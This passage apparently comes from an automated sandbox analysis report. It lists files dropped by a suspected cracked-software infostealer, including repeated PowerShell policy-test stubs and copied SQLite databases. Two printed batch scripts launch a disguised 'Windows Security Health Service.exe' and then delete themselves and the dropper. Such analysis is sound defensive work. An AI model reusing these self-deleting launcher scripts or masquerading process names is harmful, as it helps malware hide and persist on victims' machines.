                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rv0kv2z1.um5.psm1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sj02ui00.c5d.psm1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_spxbkktc.dlg.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t4cez4hk.b1d.psm1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tbqqqo4f.ddo.psm1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ug4zy3bq.c2o.psm1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uhzbbwl4.qnn.psm1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v0ihxh3q.wba.psm1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wazwk0ap.wl4.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wcdhcy2m.1k4.psm1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xrqwcfbv.ext.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ye5zn3hk.nnh.ps1

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\places.raw

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                  Category:dropped
                                                  Size (bytes):5242880
                                                  Entropy (8bit):0.03859996294213402
                                                  Encrypted:false
                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                  MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                  SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                  SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                  SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                  Malicious:false
                                                  Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\tmpE306.tmp.bat

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\Cracked.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):177
                                                  Entropy (8bit):5.15061698111028
                                                  Encrypted:false
                                                  SSDEEP:3:mKDDCMNqTtvL5oUkh4EaKC59KeAHXZfRX2ypLvmqRDUkh4E2J5xAInTRIKWVgHVk:hWKqTtT69aZ5+XXpLvmq1923fTrWVCVk
                                                  MD5:2437D4A6CD70F079877E9E15FA3EB7E8
                                                  SHA1:1FDFFF4DCF7B9588B8F2A426CA955097699B6D36
                                                  SHA-256:ECA836856E1FCBDE41622507C81628ED3ADEB873460A2BA126C48AA21927AA83
                                                  SHA-512:00AA6D33BB28DBD3369EE9D8233D1E530BA21D9B22CAB75B77B9B38B07017DF279B9B7BED9384B437B8BD4D4A3A15C9AF60CAE0CBE5E6B15A29B813E26F31D06
                                                  Malicious:false
                                                  Preview:@echo off..timeout 3 > NUL..START "" "C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpE306.tmp.bat" /f /q..

                                                  C:\Users\user\AppData\Local\Temp\tmpE49C.tmp.cmd

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\crack.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):153
                                                  Entropy (8bit):4.938847506633469
                                                  Encrypted:false
                                                  SSDEEP:3:mKDDCMNtF9covO9GXvJdAQDwU1hoZDUkh4E2J5xAInajDUkh4E2J5xAIPAbBQty:hWK3aoW9GfT9DNoN923faP923fPc
                                                  MD5:0CE8B692F9CE46B028C9049DC0389FB7
                                                  SHA1:B3F7AD6BD3479ADB8A19FEB0DD3D2703568D89B5
                                                  SHA-256:9D66025B587E9823B79D972966FC5184E64E42D724638B133881F4131AEA1991
                                                  SHA-512:486603B622D766710BC74329129789E8B6B995CABE9F618014DE039AFFF9A5E237407596C2D5D3DFA891F4E31A38E83547BF31F74B6161697E09DCB180BB9474
                                                  Malicious:false
                                                  Preview:@echo off..timeout 4 > NUL..DEL "crack.exe" /f /q..CDC:\Users\user\AppData\Local\Temp\..DEL"C:\Users\user\AppData\Local\Temp\tmpE49C.tmp.cmd" /f /q..

                                                  C:\Users\user\AppData\Local\Temp\tmpFAD4.tmp.dat

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                  Category:dropped
                                                  Size (bytes):106496
                                                  Entropy (8bit):1.136413900497188
                                                  Encrypted:false
                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                  MD5:429F49156428FD53EB06FC82088FD324
                                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                  Malicious:false
                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\tmpFAF4.tmp.dat

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                  Category:dropped
                                                  Size (bytes):40960
                                                  Entropy (8bit):0.8553638852307782
                                                  Encrypted:false
                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                  Malicious:false
                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\tmpFB05.tmp.dat

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                  Category:dropped
                                                  Size (bytes):159744
                                                  Entropy (8bit):0.5394293526345721
                                                  Encrypted:false
                                                  SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                  MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                  SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                  SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                  SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                  Malicious:false
                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\tmpFB25.tmp.dat

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                  Category:dropped
                                                  Size (bytes):159744
                                                  Entropy (8bit):0.5394293526345721
                                                  Encrypted:false
                                                  SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                  MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                  SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                  SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                  SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                  Malicious:false
                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\tmpFB32.tmp.dat

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                  Category:dropped
                                                  Size (bytes):106496
                                                  Entropy (8bit):1.136413900497188
                                                  Encrypted:false
                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                  MD5:429F49156428FD53EB06FC82088FD324
                                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                  Malicious:false
                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\tmpFB36.tmp.dat

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                  Category:dropped
                                                  Size (bytes):106496
                                                  Entropy (8bit):1.136413900497188
                                                  Encrypted:false
                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                  MD5:429F49156428FD53EB06FC82088FD324
                                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                  Malicious:false
                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\tmpFB46.tmp.dat

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                  Category:dropped
                                                  Size (bytes):196608
                                                  Entropy (8bit):1.121297215059106
                                                  Encrypted:false
                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                  Malicious:false
                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\tmpFB52.tmp.dat

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                  Category:dropped
                                                  Size (bytes):40960
                                                  Entropy (8bit):0.8553638852307782
                                                  Encrypted:false
                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                  Malicious:false
                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\tmpFB57.tmp.dat

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                  Category:dropped
                                                  Size (bytes):196608
                                                  Entropy (8bit):1.121297215059106
                                                  Encrypted:false
                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                  Malicious:false
                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\tmpFB63.tmp.dat

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                  Category:dropped
                                                  Size (bytes):159744
                                                  Entropy (8bit):0.5394293526345721
                                                  Encrypted:false
                                                  SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                  MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                  SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                  SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                  SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                  Malicious:false
                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\tmpFB68.tmp.dat

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                  Category:dropped
                                                  Size (bytes):51200
                                                  Entropy (8bit):0.8746135976761988
                                                  Encrypted:false
                                                  SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                  MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                  SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                  SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                  SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                  Malicious:false
                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\tmpFB73.tmp.dat

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                  Category:dropped
                                                  Size (bytes):159744
                                                  Entropy (8bit):0.5394293526345721
                                                  Encrypted:false
                                                  SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                  MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                  SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                  SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
